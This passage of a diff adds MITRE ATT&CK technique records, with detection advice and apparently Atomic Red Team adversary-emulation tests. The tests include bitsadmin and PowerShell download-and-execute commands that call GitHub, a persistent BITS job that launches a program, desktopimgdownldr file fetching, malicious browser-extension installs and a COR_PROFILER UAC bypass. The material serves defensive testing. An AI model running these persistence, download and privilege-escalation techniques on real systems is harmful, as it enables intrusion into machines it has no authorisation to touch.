+ source_name: Microsoft Configure LSA + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:11:25.821Z' + created: '2020-01-24T14:54:42.757Z' + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys. + Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 + R2 may generate events when unsigned DLLs try to load into the LSA by setting + the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber + 2014) (Citation: Microsoft Configure LSA)' + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1197: + technique: + id: attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: BITS Jobs + description: |- + Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. 
+ + The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) + + Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) + + BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) + external_references: + - source_name: mitre-attack + external_id: T1197 + url: https://attack.mitre.org/techniques/T1197 + - url: https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx + description: Microsoft. (n.d.). Component Object Model (COM). Retrieved November + 22, 2017. + source_name: Microsoft COM + - url: https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx + description: Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved + January 12, 2018. + source_name: Microsoft BITS + - url: https://msdn.microsoft.com/library/aa362813.aspx + description: Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018. + source_name: Microsoft BITSAdmin + - url: https://www.secureworks.com/blog/malware-lingers-with-bits + description: Counter Threat Unit Research Team. (2016, June 6). Malware Lingers + with BITS. 
Retrieved January 12, 2018. + source_name: CTU BITS Malware June 2016 + - url: https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/ + description: Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background + Intelligent Transfer Service. Retrieved January 12, 2018. + source_name: Mondok Windows PiggyBack BITS May 2007 + - url: https://www.symantec.com/connect/blogs/malware-update-windows-update + description: Florio, E. (2007, May 9). Malware Update with Windows Update. + Retrieved January 12, 2018. + source_name: Symantec BITS May 2007 + - url: https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/ + description: Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. + Retrieved January 12, 2018. + source_name: PaloAlto UBoatRAT Nov 2017 + - url: https://technet.microsoft.com/library/dd939934.aspx + description: Microsoft. (2011, July 19). Issues with BITS. Retrieved January + 12, 2018. + source_name: Microsoft Issues with BITS July 2011 + - source_name: Elastic - Hunting for Persistence Part 1 + url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 + description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft + 101: Hunting for persistence using Elastic Security (Part 1). Retrieved + December 21, 2020.' 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:36:04.956Z' + created: '2018-04-18T17:59:24.739Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_detection: |- + BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS) + + Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016) + + Monitor and analyze network activity generated by BITS. 
BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS) + x_mitre_defense_bypassed: + - Firewall + - Host forensic analysis + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' + x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic + - Ricardo Dias + - Red Canary + x_mitre_version: '1.2' + identifier: T1197 + atomic_tests: + - name: Bitsadmin Download (cmd) + auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 + description: | + This test simulates an adversary leveraging bitsadmin.exe to download + and execute a payload + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + local_file: + description: Local file path to save downloaded file + type: path + default: "%temp%\\bitsadmin1_flag.ps1" + executor: + command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} + #{local_file} + +' + cleanup_command: 'del #{local_file} >nul 2>&1 + +' + name: command_prompt + - name: Bitsadmin Download (PowerShell) + auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc + description: | + This test simulates an adversary leveraging bitsadmin.exe to download + and execute a payload leveraging PowerShell + + Upon execution you will find a github markdown file downloaded to the Temp directory + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + local_file: + description: Local file path to save 
downloaded file + type: path + default: "$env:TEMP\\bitsadmin2_flag.ps1" + executor: + command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination + #{local_file} + +' + cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore + +' + name: powershell + - name: Persist, Download, & Execute + auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae + description: | + This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. + Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. + This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" + This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. 
+ supported_platforms: + - windows + input_arguments: + command_path: + description: Path of command to execute + type: path + default: C:\Windows\system32\notepad.exe + bits_job_name: + description: Name of BITS job + type: string + default: AtomicBITS + local_file: + description: Local file path to save downloaded file + type: path + default: "%temp%\\bitsadmin3_flag.ps1" + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + executor: + command: | + bitsadmin.exe /create #{bits_job_name} + bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" + bitsadmin.exe /resume #{bits_job_name} + timeout 5 + bitsadmin.exe /complete #{bits_job_name} + cleanup_command: 'del #{local_file} >nul 2>&1 + +' + name: command_prompt + - name: Bits download using desktopimgdownldr.exe (cmd) + auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 + description: "This test simulates using desktopimgdownldr.exe to download a + malicious file\ninstead of a desktop or lockscreen background img. The process + that actually makes \nthe TCP connection and creates the file on the disk + is a svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. 
+ See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n" + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + download_path: + description: Local file path to save downloaded file + type: path + default: SYSTEMROOT=C:\Windows\Temp + cleanup_path: + description: path to delete file as part of cleanup_command + type: path + default: C:\Windows\Temp\Personalization\LockScreenImage + cleanup_file: + description: file to remove as part of cleanup_command + type: string + default: "*.md" + executor: + command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} + /eventName:desktopimgdownldr + +' + cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 + +' + name: command_prompt + T1547: + technique: + id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf + description: |- + Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. + + Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. 
+ name: Boot or Logon Autostart Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547 + url: https://attack.mitre.org/techniques/T1547 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html + - url: http://msdn.microsoft.com/en-us/library/aa376977 + description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November + 12, 2014. + source_name: Microsoft Run Key + - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx + description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, + 2017. + source_name: MSDN Authentication Packages + - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx + description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. + source_name: Microsoft TimeProvider + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + - source_name: Linux Kernel Programming + url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf + description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel + Module Programming Guide. Retrieved April 6, 2018. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-24T13:50:12.837Z' + created: '2020-01-23T17:46:59.535Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: "Monitor for additions or modifications of mechanisms that + could be used to trigger autostart execution, such as relevant additions to + the Registry. Look for changes that are not correlated with known updates, + patches, or other planned administrative activity. Tools such as Sysinternals + Autoruns may also be used to detect system autostart configuration changes + that could be attempts at persistence.(Citation: TechNet Autoruns) Changes + to some autostart configuration settings may happen under normal conditions + when legitimate software is installed. \n\nSuspicious program execution as + autostart programs may show up as outlier processes that have not been seen + before when compared against historical data.To increase confidence of malicious + activity, data and events should not be viewed in isolation, but as part of + a chain of behavior that could lead to other activities, such as network connections + made for Command and Control, learning details about the environment through + Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically + looking for DLLs that are not recognized or not normally loaded into a process. + Look for abnormal process behavior that may be due to a process loading a + malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line + parameters involved in kernel modification or driver installation." 
+ x_mitre_permissions_required: + - User + - Administrator + - root + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'File: File Creation' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Kernel: Kernel Module Load' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + atomic_tests: [] + T1037: + technique: + id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Boot or Logon Initialization Scripts + description: "Adversaries may use scripts automatically executed at boot or + logon initialization to establish persistence. Initialization scripts can + be used to perform administrative functions, which may often execute other + programs or send information to an internal logging server. These scripts + can vary based on operating system and whether applied locally or remotely. + \ \n\nAdversaries may use these scripts to maintain persistence on a single + system. Depending on the access configuration of the logon scripts, either + local credentials or an administrator account may be necessary. \n\nAn adversary + may also be able to escalate their privileges since some boot or logon initialization + scripts run with higher privileges." 
+ external_references: + - source_name: mitre-attack + external_id: T1037 + url: https://attack.mitre.org/techniques/T1037 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-27T19:58:02.332Z' + created: '2017-05-31T21:30:38.910Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - macOS + - Windows + - Linux + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_version: '2.1' + atomic_tests: [] + T1542.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1542.003 + url: https://attack.mitre.org/techniques/T1542/003 + - external_id: CAPEC-552 + source_name: capec + url: https://capec.mitre.org/data/definitions/552.html + - source_name: Mandiant M Trends 2016 + url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf + description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved + March 5, 2019. + - url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion + description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? + (Infographic). Retrieved November 13, 2014. 
+ source_name: Lau 2011 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Bootkit + description: |- + Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. + + A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011) + + The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. + id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:47:14.338Z' + created: '2019-12-19T21:05:38.123Z' + x_mitre_defense_bypassed: + - Host intrusion prevention systems + - Anti-virus + - File monitoring + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots + of MBR and VBR and compare against known good samples. Report changes to MBR + and VBR as they occur for indicators of suspicious activity and further analysis. 
+ x_mitre_data_sources: + - 'Drive: Drive Modification' + x_mitre_platforms: + - Linux + - Windows + atomic_tests: [] + T1176: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1176 + url: https://attack.mitre.org/techniques/T1176 + - url: https://en.wikipedia.org/wiki/Browser_extension + description: Wikipedia. (2017, October 8). Browser Extension. Retrieved January + 11, 2018. + source_name: Wikipedia Browser Extension + - url: https://developer.chrome.com/extensions + description: Chrome. (n.d.). What are Extensions?. Retrieved November 16, + 2017. + source_name: Chrome Extensions Definition + - url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf + description: Jagpal, N., et al. (2015, August). Trends and Lessons from Three + Years Fighting Malicious Extensions. Retrieved November 17, 2017. + source_name: Malicious Chrome Extension Numbers + - source_name: xorrior chrome extensions macOS + url: https://www.xorrior.com/No-Place-Like-Chrome/ + description: Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved + April 27, 2021. + - url: https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ + description: Brinkmann, M. (2017, September 19). First Chrome extension with + JavaScript Crypto Miner detected. Retrieved November 16, 2017. + source_name: Chrome Extension Crypto Miner + - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses + description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME + EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL + BUSINESSES. Retrieved January 17, 2018. 
+ source_name: ICEBRG Chrome Extensions + - url: https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ + description: Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. + Retrieved November 18, 2017. + source_name: Banker Google Chrome Extension Steals Creds + - url: https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/) + description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension + Steals All Posted Data. Retrieved November 16, 2017. + source_name: Catch All Chrome Extension + - url: https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/ + description: 'Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware + campaign operating covertly since 2012. Retrieved November 16, 2017.' + source_name: Stantinko Botnet + - url: https://kjaer.io/extension-malware/ + description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might + get hacked by a Chrome extension. Retrieved November 22, 2017.' + source_name: Chrome Extension C2 Malware + description: |- + Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) + + Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. 
Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. + + Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) + + Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. 
+ + There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) + name: Browser Extensions + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-27T19:56:54.161Z' + created: '2018-01-16T16:13:52.465Z' + x_mitre_version: '1.2' + x_mitre_contributors: + - Chris Ross @xorrior + - Justin Warner, ICEBRG + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Windows Registry: Windows Registry Key Creation' + - 'File: File Creation' + x_mitre_detection: |- + Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates. + + Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation. + + On macOS, monitor the command line for usage of the profiles tool, such as profiles install -type=configuration. Additionally, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. 
Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS) + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false + identifier: T1176 + atomic_tests: + - name: Chrome (Developer Mode) + auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 + description: Turn on Chrome developer mode and Load Extension found in the src + directory + supported_platforms: + - linux + - windows + - macos + executor: + steps: | + 1. Navigate to [chrome://extensions](chrome://extensions) and + tick 'Developer Mode'. + + 2. Click 'Load unpacked extension...' and navigate to + [Browser_Extension](../t1176/src/) + + 3. Click 'Select' + name: manual + - name: Chrome (Chrome Web Store) + auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f + description: Install the "Minimum Viable Malicious Extension" Chrome extension + supported_platforms: + - linux + - windows + - macos + executor: + steps: | + 1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend + in Chrome + + 2. Click 'Add to Chrome' + name: manual + - name: Firefox + auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 + description: 'Create a file called test.wma, with the duration of 30 seconds + +' + supported_platforms: + - linux + - windows + - macos + executor: + steps: | + 1. Navigate to [about:debugging](about:debugging) and + click "Load Temporary Add-on" + + 2. Navigate to [manifest.json](./src/manifest.json) + + 3. Then click 'Open' + name: manual + - name: Edge Chromium Addon - VPN + auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 + description: 'Adversaries may use VPN extensions in an attempt to hide traffic + sent from a compromised host. This will install one (of many) available VPNS + in the Edge add-on store. + +' + supported_platforms: + - windows + - macos + executor: + steps: | + 1. 
Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj + in Edge Chromium + + 2. Click 'Get' + name: manual + T1574.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.012 + url: https://attack.mitre.org/techniques/T1574/012 + - source_name: Microsoft Profiling Mar 2017 + url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview + description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June + 24, 2020. + - source_name: Microsoft COR_PROFILER Feb 2013 + url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100) + description: Microsoft. (2013, February 4). Registry-Free Profiler Startup + and Attach. Retrieved June 24, 2020. + - source_name: RedCanary Mockingbird May 2020 + url: https://redcanary.com/blog/blue-mockingbird-cryptominer/ + description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved + May 26, 2020. + - source_name: Red Canary COR_PROFILER May 2020 + url: https://redcanary.com/blog/cor_profiler-for-persistence/ + description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation + for persistence. Retrieved June 24, 2020. + - source_name: Almond COR_PROFILER Apr 2019 + url: https://offsec.almond.consulting/UAC-bypass-dotnet.html + description: Almond. (2019, April 30). UAC bypass via elevated .NET applications. + Retrieved June 24, 2020. + - source_name: GitHub OmerYa Invisi-Shell + url: https://github.com/OmerYa/Invisi-Shell + description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, + 2020. + - source_name: subTee .NET Profilers May 2017 + url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html + description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET + Profilers. Retrieved June 24, 2020. 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: COR_PROFILER + description: |- + Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) + + The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) + + Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. 
The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) + id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-06-26T16:09:58.920Z' + created: '2020-06-24T22:30:55.843Z' + x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER, + monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and + COR_PROFILER_PATH that correspond to system and user environment variables + that do not correlate to known developer tools. Extra scrutiny should be placed + on suspicious modification of these Registry keys by command line tools like + wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring + for command-line arguments indicating a change to COR_PROFILER variables may + aid in detection. For system, user, and process scope abuse of the COR_PROFILER, + monitor for new suspicious unmanaged profiling DLLs loading into .NET processes + shortly after the CLR causing abnormal process behavior.(Citation: Red Canary + COR_PROFILER May 2020) Consider monitoring for DLL files that are associated + with COR_PROFILER environment variables.' 
+ x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_contributors: + - Jesse Brown, Red Canary + x_mitre_platforms: + - Windows + identifier: T1574.012 + atomic_tests: + - name: User scope COR_PROFILER + auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + description: | + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). + The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. + Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. + If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, + the notepad process will not execute with high integrity. 
